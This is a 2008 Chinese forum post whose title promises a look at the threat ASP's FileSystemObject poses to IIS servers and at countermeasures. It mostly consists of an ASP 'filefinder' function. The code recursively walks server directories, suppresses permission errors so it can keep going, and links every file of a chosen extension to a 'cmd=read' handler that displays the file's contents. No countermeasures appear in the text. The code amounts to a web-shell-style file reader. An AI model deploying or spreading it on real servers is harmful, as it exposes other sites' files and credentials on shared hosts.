找回密码
 加入
搜索
查看: 2371|回复: 1

ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策

[复制链接]
发表于 2008-5-3 14:20:11 | 显示全部楼层 |阅读模式
scripting.filesystemobject&nbsp;对象是由&nbsp;scrrun.dll&nbsp;提供的许多供&nbsp;vbscript/jscript&nbsp;控制的&nbsp;com&nbsp;对象之一。scripting.filesystemobject&nbsp;提供了非常便利的文本文件和文件目录的访问,但是同时也对&nbsp;iis&nbsp;web&nbsp;服务器数据安全造成了一定的威胁。<br /><br />filefinder&nbsp;的代码很简单,由3&nbsp;个函数和&nbsp;30&nbsp;行左右的顺序代码构成。<br /><br />最关键的是&nbsp;findfiles&nbsp;函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩展名来搜寻这些文件。<br /><br />&nbsp;程序代码 <div><br />&lt;%<br />function&nbsp;findfiles(strstartfolder,&nbsp;strext)<br /><br />dim&nbsp;n<br /><br />dim&nbsp;othisfolder<br /><br />dim&nbsp;ofolders<br /><br />dim&nbsp;ofiles<br /><br />dim&nbsp;ofolder<br /><br />dim&nbsp;ofile<br /><br />'&nbsp;如果系统管理员对文件系统的权限进行细致的设置话,下面的代码就要出错<br /><br />'&nbsp;但是有些目录还是可以察看的,所以我们简单的把错误忽略过去<br /><br />on&nbsp;error&nbsp;resume&nbsp;next<br /><br />n&nbsp;=&nbsp;0<br /><br />response.write&nbsp;&quot;&lt;b&gt;searching&nbsp;&quot;&nbsp;&amp;&nbsp;strstartfolder&nbsp;&amp;&nbsp;&quot;&lt;/b&gt;&lt;br&gt;&quot;<br /><br />set&nbsp;othisfolder&nbsp;=&nbsp;g_fs.getfolder(strstartfolder)<br /><br />set&nbsp;ofiles&nbsp;=&nbsp;othisfolder.files<br /><br />for&nbsp;each&nbsp;ofile&nbsp;in&nbsp;ofiles<br /><br />'&nbsp;如果是指定的文件扩展名,输出连接导向本身,但用不同的命令&nbsp;cmd<br /><br />'&nbsp;在这里是&nbsp;cmd=read,即读出指定物理路径的文本文件<br /><br />if&nbsp;issuffix(ofile.path,&nbsp;strext)&nbsp;then<br /><br />response.write&nbsp;&quot;&lt;a&nbsp;target=_blank&nbsp;href='ff.asp?cmd=read&amp;path=&quot;&nbsp;&amp;&nbsp;server.htmlencode(ofile.path)&nbsp;&amp;&nbsp;&quot;'&gt;&lt;font&nbsp;color='dodgerblue'&gt;&quot;&nbsp;&amp;&nbsp;ofile.path&nbsp;&amp;&nbsp;&quot;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;&quot;<br /><br />if&nbsp;err&nbsp;=&nbsp;0&nbsp;then<br /><br />n&nbsp;=&nbsp;n&nbsp;+&nbsp;1<br /><br />end&nbsp;if<br /><br />end&nbsp;if<br /><br />next<br /><br />set&nbsp;ofolders&nbsp;=&nbsp;othisfolder.subfolders<br /><br />for&nbsp;each&nbsp;ofolder&nbsp;in&nbsp;ofolders<br /><br />n&nbsp;=&nbsp;n&nbsp;+&nbsp;findfiles(ofolder.path,&nbsp;strext)<br /><br />next<br /><br />findfiles&nbsp;=&nbsp;n<br /><br />end&nbsp;function<br />%&gt;<br />
发表于 2010-12-3 03:13:36 | 显示全部楼层
学习一下......
您需要登录后才可以回帖 登录 | 加入

本版积分规则

QQ|手机版|小黑屋|AUTOIT CN ( 鲁ICP备19019924号-1 )谷歌 百度

GMT+8, 2024-12-4 16:35 , Processed in 0.068536 second(s), 20 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表